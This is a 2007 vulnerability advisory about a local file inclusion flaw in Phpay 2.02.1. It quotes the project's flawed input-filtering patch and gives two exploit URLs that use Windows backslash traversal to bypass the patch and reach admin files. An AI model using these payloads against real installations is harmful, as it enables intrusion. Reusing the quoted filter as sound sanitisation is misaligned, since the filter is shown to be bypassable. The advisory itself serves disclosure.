Security Advisory: Phpay - Local File Inclusion - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Adult Script Unauthorized Administrative Access Exploit
  Information disclosure vulnerabilities in WordPress
  Anon Proxy Server - Remote Code Execution
  Wordpress - Broken Access Control

From: th3.r00k_(at)_gmail.com <th3.r00k_(at)_gmail.com>
Date: 16.12.2007
Subject: Phpay - Local File Inclusion

By Michael Brooks

Vulnerability Type:Local File Inclusion

Software: Phpay

Homepage:http://sourceforge.net/projects/phpay/

Version Affected:2.02.1

Phpay has been affected by multiple local file include flaws, as a result this patch was written:

$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.
inc.php"; echo "\n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}

require("./$config");

To bypass this patch backslashes can be used instead of forward slashes on windows systems.

Also .inc.php must exists *somewhere* in the string.

Local File Include for windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..
\\admin\\.htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.
htaccess

Remote code execution is accessible in the ./admin/ folder.

The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration:

A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.

Merry Christmas

test server